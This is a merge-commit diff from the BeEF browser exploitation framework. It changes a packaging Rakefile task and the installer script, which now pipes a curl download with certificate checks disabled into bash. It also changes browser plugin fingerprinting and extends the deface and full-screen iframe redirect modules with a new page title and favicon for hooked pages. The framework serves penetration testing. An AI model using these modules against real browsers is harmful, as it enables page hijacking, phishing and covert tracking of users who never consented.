Merge branch 'master' of github.com:beefproject/beef

Rakefile

@@ -165,10 +165,32 @@ task :cde do
   sh "make";
   Dir.chdir "..";
   puts "\nCreating CDE Package...\n";
-  sh "./CDE/cde ruby beef";
-  sleep (1);
+  sh "bundle install"
+  Rake::Task['cde_beef_start'].invoke
+  Rake::Task['beef_stop'].invoke
   puts "\nCleaning Up...\n";
-  sh "rm -r CDE";
+  sleep (2);	
+  sh "rm -rf CDE";
   puts "\nCDE Package Created...\n";
  end
 
+################################
+# CDE/BeEF environment set up
+
+@beef_process_id = nil;
+
+task :cde_beef_start => 'beef' do
+  printf "Starting CDE BeEF (wait 10 seconds)..."
+  @beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+")
+  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays.each do |i| # delay for 10 seconds
+    printf '.'
+    sleep (i)
+  end
+  puts '.'
+end
+
+
+################################
+
+

core/main/client/browser.js

@@ -597,29 +597,37 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
 	 * Returns the list of plugins installed in the browser.
 	 */
 	getPlugins: function() {
-		var results = '';
-        if (this.isIE())
-        {
-            results = this.getPluginsIE();
-        } else {
-            if (navigator.plugins && navigator.plugins.length > 0)
-            {
-                var length = navigator.plugins.length;
-                for (var i=0; i < length; i++)
-                {
-                    if (i != 0)
-                        results += '\n';
-                    if(beef.browser.isFF()){ //FF returns exact plugin versions
-                        results += navigator.plugins[i].name + '-v.' + navigator.plugins[i].version;
-                    }else{ // Webkit and Presto (Opera) doesn't support the version attribute, and
-                           // sometimes they store plugin version in description (Real, Adobe)
-                        results += navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
-                    }
-                }
-            } else {
-                results = 'navigator.plugins is not supported in this browser!';
-            }
-        }
+
+		var results;
+		Array.prototype.unique = function() {
+			var o = {}, i, l = this.length, r = [];
+			for(i=0; i<l;i+=1) o[this[i]] = this[i];
+			for(i in o) r.push(o[i]);
+			return r;
+		};
+
+		// Internet Explorer
+		if (this.isIE()) this.getPluginsIE();
+
+		// All other browsers that support navigator.plugins
+		else if (navigator.plugins && navigator.plugins.length > 0) {
+			results = new Array();
+			for (var i=0; i < navigator.plugins.length; i++) {
+
+				// Firefox returns exact plugin versions
+				if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version;
+
+				// Webkit and Presto (Opera)
+				// Don't support the version attribute
+				// Sometimes store the version in description (Real, Adobe)
+				else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
+			}
+			results = results.unique().toString();
+
+		// All browsers that don't support navigator.plugins
+		} else results = 'navigator.plugins is not supported in this browser!';
+
+		// Return results
 		return results;
 	},
 	

install-beef

@@ -18,6 +18,17 @@ clear
 echo "======================================"
 echo "          BeEF Installer   "
 echo "======================================"
+echo ""
+
+echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environemnt and it's dependencies." 
+echo "" 
+echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems."
+echo ""
+read -p  "Are you sure you wish to continue (Y/n)? " 
+if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then
+	 exit;
+fi
+
 echo ""
 echo "Detecting OS..";
 
@@ -52,7 +63,6 @@ if [ "$OS" == "Darwin" ]; then
 	bundle install
 	OK="yes"
 	
-	cd beef	
 	./beef
 	
 	echo ""
@@ -69,17 +79,31 @@ if [ "$Distro" == "Debian" ]; then
 	echo "Debian/Ubuntu Detected"
 	echo "Installing Prerequisite Packages.."
 	sudo apt-get update 
-	sudo apt-get install ruby1.9.1-dev build-essential libsqlite3-ruby libsqlite3-dev build-essential libsqlite3-ruby git libsqlite3-dev rake 
+	sudo apt-get install curl git
+
+
+
+sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
+
+bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+
+echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
+
+source ~/.bashrc
+source $HOME/.rvm/scripts/rvm
+
+	rvm install 1.9.2
+	rvm use 1.9.2 --default
 
 	echo "Downloading BeEF.."
 	git clone git://github.com/beefproject/beef.git
 	cd beef
 
 	echo "Installing Ruby Gems"
-	sudo gem install bundler
-	sudo bundle install
+	gem install bundler
+	bundle install
+	
 	
-	cd beef
 	./beef
 
 	OK="yes"
@@ -115,7 +139,6 @@ if [ "$Distro" == "RedHat" ]; then
 	
 	source ~/.bash_profile
 	
-	cd beef
 	./beef
 
 	OK="yes"
@@ -128,7 +151,7 @@ if [ "$Distro" == "RedHat" ]; then
 fi
 
 if [ "$OK" == "yes" ]; then		
-
+echo ""
 else 
 	echo ""
 	echo "======================================="

modules/browser/hooked_domain/deface_web_page/command.js

@@ -14,7 +14,10 @@
 //   limitations under the License.
 //
 beef.execute(function() {
+
 	document.body.innerHTML = "<%= @deface_content %>";
+	document.title = "<%= @deface_title %>";
+	beef.browser.changeFavicon("<%= @deface_favicon %>");
 
     beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Deface Successful");
 });

modules/browser/hooked_domain/deface_web_page/config.yaml

@@ -19,7 +19,7 @@ beef:
             enable: true
             category: ["Browser","Hooked Domain"]
             name: "Replace Content (Deface)"
-            description: "Overwrite the body of the page the hooked browser is on with the 'Deface Content' string."
+            description: "Overwrite the page, title and shortcut icon on the hooked page."
             authors: ["antisnatchor"]
             target:
                 user_notify: ['ALL']

modules/browser/hooked_domain/deface_web_page/module.rb

@@ -16,7 +16,11 @@
 class Deface_web_page < BeEF::Core::Command
 
   def self.options
+	configuration = BeEF::Core::Configuration.instance
+	favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
     return [
+		{ 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
+		{ 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },
         { 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label'=>'Deface Content', 'type' => 'textarea', 'value' =>'BeEF!', 'width' => '400px', 'height' => '100px' }
     ]
   end

modules/browser/hooked_domain/site_redirect_iframe/command.js

@@ -18,6 +18,7 @@ beef.execute(function() {
 	var result = 'Iframe successfully created!';
 	var title = '<%= @iframe_title %>';
 	var iframe_src = '<%= @iframe_src %>';
+	var iframe_favicon = '<%= @iframe_favicon %>';
 	var sent = false;
 
 	$j("iframe").remove();
@@ -25,6 +26,7 @@ beef.execute(function() {
 	beef.dom.createIframe('fullscreen', 'get', {'src':iframe_src}, {}, function() { if(!sent) { sent = true; document.title = title; beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); } });
 	document.body.scroll = "no";
 	document.documentElement.style.overflow = 'hidden';
+	beef.browser.changeFavicon(iframe_favicon);
 
 	setTimeout(function() { 
 		if(!sent) {

modules/browser/hooked_domain/site_redirect_iframe/config.yaml

@@ -19,7 +19,7 @@ beef:
             enable: true
             category: ["Browser","Hooked Domain"]
             name: "Redirect Browser (iFrame)"
-            description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title and the time delay are specified in the parameters below.<br><br>The content of the URL bar will not be changed in the hooked browser."
+            description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.<br><br>The content of the URL bar will not be changed in the hooked browser."
             authors: ["ethicalhack3r", "Yori Kvitchko"]
             target:
                 user_notify: ["ALL"]

modules/browser/hooked_domain/site_redirect_iframe/module.rb

@@ -16,8 +16,12 @@
 class Site_redirect_iframe < BeEF::Core::Command
   
     def self.options
+		configuration = BeEF::Core::Configuration.instance
+		favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
         return [
 			  { 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
+			  { 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },
+
 			  { 'name' => 'iframe_src', 'description' => 'Source of the iFrame', 'ui_label' => 'Redirect URL', 'value' => 'http://beefproject.com/', 'width'=>'200px' },
 			  { 'name' => 'iframe_timeout', 'description' => 'iFrame timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width'=>'150px' }
         ]